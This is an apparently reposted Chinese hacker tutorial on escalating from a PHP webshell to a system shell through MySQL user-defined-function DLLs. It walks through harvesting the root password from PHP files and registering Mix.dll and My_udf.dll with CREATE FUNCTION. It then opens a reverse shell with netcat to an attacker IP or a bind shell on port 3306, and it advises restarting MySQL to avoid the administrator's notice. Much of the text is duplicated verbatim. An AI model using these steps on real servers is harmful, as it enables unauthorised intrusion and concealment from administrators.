WEBSHELL提升權(quán)限又一招(Mysql漏洞)
發(fā)布日期:2022-01-02 01:42 | 文章來源:源碼中國
S-serv提權(quán)方式人人都會用了,搞得現(xiàn)在的主機都配置得非常安全,看來攻擊手法的層出不窮也是造成中國網(wǎng)絡(luò)安全進步的一大原因之一,還有其他的pcanywhere獲取密碼,替換服務(wù),等等。但是現(xiàn)在也沒這么好搞了,隨著安全意識的提高,之前的方式估計不怎么管用,現(xiàn)在我給大家介紹一下一種新的提權(quán)方式,看過古典LM做的那動畫的朋友都知道吧?利用MYSQLl弱口令拿到系統(tǒng)權(quán)限,在WEBSHEL上也可實現(xiàn),不過有個前提,就是目標主機裝有MYSQL,而你又知道MYSQL的用戶和密碼,才可以進行提權(quán)。WEBSHELL獲得了,找用戶和密碼也不是什么難事?,F(xiàn)在我拿我另外一臺機器做示范,已經(jīng)把PHPSHELL傳上去了,如圖1
一般來說連接MYSQL的帳戶密碼很好找,隨便編輯一個PHP文件,就看到了。如圖2
看到了吧,用戶名:root 密碼:123456 庫名:php 然后怎么辦呢?先用SQL Query 建立連接,如圖3
哈連接成功了,現(xiàn)在開始將我們的提權(quán)用滴東東:Mix.dll My_udf.dll上傳上去先.OK,傳好了,Mix.dll用于反彈連接,My_udf.dll是正向連接,直接用連接對方的3306端口然后輸入密碼就可獲得CMDSHELL。好,不多說了,傳上去之后呢就執(zhí)行以下SQL語句create function Mixconnect returns string soname 'd:\\php\\php\\Mix.dll'; 來注冊函數(shù).
出現(xiàn)SQL語句成功執(zhí)行!如圖4
離拿到CMDSHELL已經(jīng)不遠了,我們先用NC在本地監(jiān)聽一個端口先,Nc -l -p 1234 (這個我想不用截圖了吧)而后執(zhí)行語句:select Mixconnect('192.168.1.254','1234'); 來激活那個函數(shù),如圖5
執(zhí)行成功,然后看看我們的NC有反映沒,如圖6
成功得到CMSHELL,不過這時對方的MYSQL已經(jīng)假死咯,我們要把MYSQL服務(wù)進程給kill掉,然后重新啟動MYSQL服務(wù)才行,不然管理員發(fā)現(xiàn)網(wǎng)站運行不了了,那就。。。。如果該服務(wù)器不允許連接任何外部IP和端口,而他的3306端口卻是對外開的!這時My_udf.dll就該上場了,使用方法和Mix一樣,連接MYSQL成功后執(zhí)行如下語句:create function my_udfdoor returns string soname 'D:\\php\\php\my_udf.dll'; 執(zhí)行語句成功后,然后我們就開始激活這個函數(shù),輸入語句:select my_udfdoor (''); 然后用nc連接3306端口,然后輸入f**k 就可以得到一個cmdshell了如圖7
OK成功!測試結(jié)束咯

一般來說連接MYSQL的帳戶密碼很好找,隨便編輯一個PHP文件,就看到了。如圖2

看到了吧,用戶名:root 密碼:123456 庫名:php 然后怎么辦呢?先用SQL Query 建立連接,如圖3

哈連接成功了,現(xiàn)在開始將我們的提權(quán)用滴東東:Mix.dll My_udf.dll上傳上去先.OK,傳好了,Mix.dll用于反彈連接,My_udf.dll是正向連接,直接用連接對方的3306端口然后輸入密碼就可獲得CMDSHELL。好,不多說了,傳上去之后呢就執(zhí)行以下SQL語句create function Mixconnect returns string soname 'd:\\php\\php\\Mix.dll'; 來注冊函數(shù).
出現(xiàn)SQL語句成功執(zhí)行!如圖4

離拿到CMDSHELL已經(jīng)不遠了,我們先用NC在本地監(jiān)聽一個端口先,Nc -l -p 1234 (這個我想不用截圖了吧)而后執(zhí)行語句:select Mixconnect('192.168.1.254','1234'); 來激活那個函數(shù),如圖5

執(zhí)行成功,然后看看我們的NC有反映沒,如圖6

成功得到CMSHELL,不過這時對方的MYSQL已經(jīng)假死咯,我們要把MYSQL服務(wù)進程給kill掉,然后重新啟動MYSQL服務(wù)才行,不然管理員發(fā)現(xiàn)網(wǎng)站運行不了了,那就。。。。如果該服務(wù)器不允許連接任何外部IP和端口,而他的3306端口卻是對外開的!這時My_udf.dll就該上場了,使用方法和Mix一樣,連接MYSQL成功后執(zhí)行如下語句:create function my_udfdoor returns string soname 'D:\\php\\php\my_udf.dll'; 執(zhí)行語句成功后,然后我們就開始激活這個函數(shù),輸入語句:select my_udfdoor (''); 然后用nc連接3306端口,然后輸入f**k 就可以得到一個cmdshell了如圖7

OK成功!測試結(jié)束咯
版權(quán)聲明:本站文章來源標注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。
相關(guān)文章
下一篇: